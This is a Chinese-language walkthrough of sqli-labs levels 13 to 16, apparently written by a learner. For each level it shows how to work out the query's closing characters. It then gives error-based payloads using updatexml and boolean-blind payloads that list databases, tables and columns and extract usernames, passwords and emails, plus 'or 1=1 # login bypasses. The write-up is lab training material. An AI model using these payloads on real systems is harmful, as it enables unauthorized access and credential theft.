Less-13
首先上来判断闭合方式是什么,我们输入1' ,看看页面回显情况
1后面有个括号,那我们输入 1') # 看一下页面回显
发现页面不报错了,但是没有回显内容,我们联想一下前几道题,页面回显不改变,会用到报错注入和盲注两种方式 ,要是盲注的话,布尔盲注和时间盲注这俩的页面回显会有变动,所以我们这道题选择报错注入,报错注入的方式还是用updatexml。
//updatexml格式
updatexml(xml_doument,Xpath_String,new_value);
我们使用:updatexml(1,concat(0x7e,(...),0x7e),1);
1.获取数据库
') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
2.获取表
')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #
3.获取列
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) #
我们会发现出来这条语句,怎么没有username和password呀,我们忽略了一点,updatexml报错有报错字符大小限制,不能完全显示出来,所以我们就不用group了,我们用limit,一个个试一试
//usename
') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 4,1),0x7e),1) #
//password
') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 5,1),0x7e),1) #
4.获取字段
也是用limit,让他们一个个输出
') and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #
成功!!!
Less-14
发现和上一关一样,说明还是报错注入
那我们就判断闭合方式即可,其余步骤和上一关做法一样
说明闭合方式是双引号
直接显示最后一步,输出字段,也是用limit一次一次输出
"and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #
Less-15
判断注入点,闭合方式,输入万能密码 'or 1=1 # 发现页面只显示登陆成功,其余又不显示,看题干,那就是盲注中的布尔盲注了。
1.获取数据库长度(需要自己去尝试),登陆成功说明正确
' or length(database()) = 8 #
1.获取数据库,因为我们并不知道用户名是什么,所以用or
//secutity
' or ascii(substr((select database()),1,1)) = 115 #
...
2.表名
//长度
' or (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 #
//emails
' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101 #
...
3.列名
//长度
' or (select length(column_name) from information_schema.columns where table_name='emails' limit 0,1) = 2 #
' or (select length(column_name) from information_schema.columns where table_name='emails' limit 1,1) = 8 #
//id
' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) = 105 #
...
//email_id
' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) = 101 #
...
4.字段
//长度
'or (select length(email_id) from emails limit 0,1) = 16 #
# 第一个字段第一个字母是 D
' or ascii(substr((select email_id from emails limit 0,1),1,1)) = 68 #
Less-16
和第15关一样,就是闭合方式有区别
本关的闭合方式是 ")
先用万能密码登录,测试闭合方式
") or 1=1 #
登陆成功!
其余步骤和第15关一样